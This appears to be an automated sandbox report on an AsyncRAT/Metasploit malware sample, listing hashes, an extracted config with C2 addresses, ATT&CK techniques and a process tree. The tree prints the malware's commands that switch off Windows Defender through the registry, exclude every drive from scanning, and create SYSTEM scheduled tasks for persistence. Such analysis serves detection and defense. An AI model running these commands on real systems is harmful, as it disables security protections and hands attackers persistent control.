asyncrat | 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22

Analysis

max time kernel
53s
max time network
62s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
26/03/2025, 19:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
Size

13.0MB
MD5

66f293c1394e81b02da06a86f5bcb249
SHA1

ac0b8acc5eb9395d6a8a40be01a3e75a7208e23c
SHA256

00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22
SHA512

b3bd8252473e9960cdf32d3d89e6f1df3ced96621ae12d085e58705dd12803d5a3e90e1a6899545921f7f32f2bf9072fd26d147a0dd2fb4d3edc21f0a756ca1e
SSDEEP

393216:mtoHOLHsaSZ2pczKc1esHdZYjzGLO51D6GCoJ:NOL7mH9ZEN5h6RE

Score

10^/10

asyncrat metasploit default backdoor defense_evasion discovery evasion execution rat trojan

Malware Config

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:3001

108.252.227.16:3001

Attributes

delay
1
install
true
install_file
dsg$4yt.exe
install_folder
%AppData%

aes.plain

Extracted

Family

metasploit

Version

metasploit_stager

0.0.0.0:3000

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x0007000000024220-16.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1704	powershell.exe
924	powershell.exe
3636	powershell.exe
876	powershell.exe
4896	powershell.exe
5064	powershell.exe
4572	powershell.exe
2804	powershell.exe
2740	powershell.exe
2900	powershell.exe
4812	powershell.exe
3236	powershell.exe
3700	powershell.exe
2772	powershell.exe
2888	powershell.exe
4300	powershell.exe
4296	powershell.exe
2448	powershell.exe
3032	powershell.exe
3616	powershell.exe
2284	powershell.exe
4584	powershell.exe
544	powershell.exe
552	powershell.exe
2836	powershell.exe
2804	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe

Executes dropped EXE 5 IoCs

pid	Process
2512	HOlC2.1.exe
4076	svchost.exe
4404	HOIC.2.1.exe
4304	dsg$4yt.exe
4460	Anti Malware Service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HOIC.2.1.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2888	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1156	schtasks.exe
3644	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
552	powershell.exe
552	powershell.exe
2900	powershell.exe
2900	powershell.exe
924	powershell.exe
924	powershell.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
4076	svchost.exe
2448	powershell.exe
2448	powershell.exe
3636	powershell.exe
3636	powershell.exe
2836	powershell.exe
2836	powershell.exe
4812	powershell.exe
4812	powershell.exe
3032	powershell.exe
3032	powershell.exe
3236	powershell.exe
3236	powershell.exe
876	powershell.exe
876	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
4896	powershell.exe
4896	powershell.exe
4896	powershell.exe
3616	powershell.exe
3616	powershell.exe
5064	powershell.exe
5064	powershell.exe
2804	powershell.exe
2804	powershell.exe
2284	powershell.exe
2284	powershell.exe
2772	powershell.exe
2772	powershell.exe
4584	powershell.exe
4584	powershell.exe
4584	powershell.exe
544	powershell.exe
544	powershell.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	924	powershell.exe
Token: SeDebugPrivilege	4076	svchost.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	3236	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	4304	dsg$4yt.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeDebugPrivilege	2888	powershell.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeDebugPrivilege	4296	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2416 wrote to memory of 2512	2416	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	88
PID 2416 wrote to memory of 2512	2416	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	88
PID 2416 wrote to memory of 4076	2416	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	90
PID 2416 wrote to memory of 4076	2416	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	90
PID 2512 wrote to memory of 4296	2512	HOlC2.1.exe	91
PID 2512 wrote to memory of 4296	2512	HOlC2.1.exe	91
PID 2512 wrote to memory of 4724	2512	HOlC2.1.exe	92
PID 2512 wrote to memory of 4724	2512	HOlC2.1.exe	92
PID 2512 wrote to memory of 4696	2512	HOlC2.1.exe	93
PID 2512 wrote to memory of 4696	2512	HOlC2.1.exe	93
PID 4696 wrote to memory of 1156	4696	cmd.exe	94
PID 4696 wrote to memory of 1156	4696	cmd.exe	94
PID 2512 wrote to memory of 1552	2512	HOlC2.1.exe	95
PID 2512 wrote to memory of 1552	2512	HOlC2.1.exe	95
PID 1552 wrote to memory of 4772	1552	cmd.exe	96
PID 1552 wrote to memory of 4772	1552	cmd.exe	96
PID 2512 wrote to memory of 3440	2512	HOlC2.1.exe	97
PID 2512 wrote to memory of 3440	2512	HOlC2.1.exe	97
PID 3440 wrote to memory of 4780	3440	cmd.exe	98
PID 3440 wrote to memory of 4780	3440	cmd.exe	98
PID 2512 wrote to memory of 696	2512	HOlC2.1.exe	99
PID 2512 wrote to memory of 696	2512	HOlC2.1.exe	99
PID 696 wrote to memory of 552	696	cmd.exe	100
PID 696 wrote to memory of 552	696	cmd.exe	100
PID 2416 wrote to memory of 4404	2416	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	101
PID 2416 wrote to memory of 4404	2416	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	101
PID 2416 wrote to memory of 4404	2416	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	101
PID 2512 wrote to memory of 3960	2512	HOlC2.1.exe	102
PID 2512 wrote to memory of 3960	2512	HOlC2.1.exe	102
PID 3960 wrote to memory of 2900	3960	cmd.exe	103
PID 3960 wrote to memory of 2900	3960	cmd.exe	103
PID 2512 wrote to memory of 1908	2512	HOlC2.1.exe	105
PID 2512 wrote to memory of 1908	2512	HOlC2.1.exe	105
PID 1908 wrote to memory of 924	1908	cmd.exe	106
PID 1908 wrote to memory of 924	1908	cmd.exe	106
PID 4076 wrote to memory of 2908	4076	svchost.exe	107
PID 4076 wrote to memory of 2908	4076	svchost.exe	107
PID 4076 wrote to memory of 4224	4076	svchost.exe	109
PID 4076 wrote to memory of 4224	4076	svchost.exe	109
PID 2512 wrote to memory of 4968	2512	HOlC2.1.exe	111
PID 2512 wrote to memory of 4968	2512	HOlC2.1.exe	111
PID 4968 wrote to memory of 2448	4968	cmd.exe	113
PID 4968 wrote to memory of 2448	4968	cmd.exe	113
PID 2908 wrote to memory of 3644	2908	cmd.exe	115
PID 2908 wrote to memory of 3644	2908	cmd.exe	115
PID 4224 wrote to memory of 2888	4224	cmd.exe	114
PID 4224 wrote to memory of 2888	4224	cmd.exe	114
PID 2512 wrote to memory of 4788	2512	HOlC2.1.exe	138
PID 2512 wrote to memory of 4788	2512	HOlC2.1.exe	138
PID 4788 wrote to memory of 3636	4788	cmd.exe	117
PID 4788 wrote to memory of 3636	4788	cmd.exe	117
PID 2512 wrote to memory of 4696	2512	HOlC2.1.exe	140
PID 2512 wrote to memory of 4696	2512	HOlC2.1.exe	140
PID 4696 wrote to memory of 2836	4696	cmd.exe	121
PID 4696 wrote to memory of 2836	4696	cmd.exe	121
PID 2512 wrote to memory of 3720	2512	HOlC2.1.exe	122
PID 2512 wrote to memory of 3720	2512	HOlC2.1.exe	122
PID 3720 wrote to memory of 4812	3720	cmd.exe	123
PID 3720 wrote to memory of 4812	3720	cmd.exe	123
PID 2512 wrote to memory of 2672	2512	HOlC2.1.exe	124
PID 2512 wrote to memory of 2672	2512	HOlC2.1.exe	124
PID 2672 wrote to memory of 3032	2672	cmd.exe	125
PID 2672 wrote to memory of 3032	2672	cmd.exe	125
PID 2512 wrote to memory of 4924	2512	HOlC2.1.exe	127

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
"C:\Users\Admin\AppData\Local\Temp\00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2416
- C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe
  "C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
    3⤵
    PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
    3⤵
    PID:4724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4696
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1552
  - - C:\Windows\system32\reg.exe
      reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3440
  - - C:\Windows\system32\reg.exe
      reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:4780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
    3⤵
    PID:4924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
    3⤵
    PID:1032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
    3⤵
    PID:2988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
    3⤵
    PID:4300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
    3⤵
    PID:3728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
    3⤵
    PID:4788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
    3⤵
    PID:4696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
    3⤵
    PID:1568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
    3⤵
    PID:4432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
    3⤵
    PID:2960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
    3⤵
    PID:4288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
    3⤵
    PID:1184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
    3⤵
    PID:2448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
    3⤵
    PID:3636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
    3⤵
    PID:2836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
    3⤵
    PID:3172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
    3⤵
    PID:3032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
    3⤵
    PID:664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
    3⤵
    PID:628
  - - C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
      "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
      4⤵
      Executes dropped EXE
      PID:4460
    - - C:\Windows\SYSTEM32\rundll32.exe
        
        rundll32
        5⤵
        
        PID:4472
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4076
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dsg$4yt" /tr '"C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "dsg$4yt" /tr '"C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9097.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4224
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:2888
  - - C:\Users\Admin\AppData\Roaming\dsg$4yt.exe
      "C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4304
- C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe
  "C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

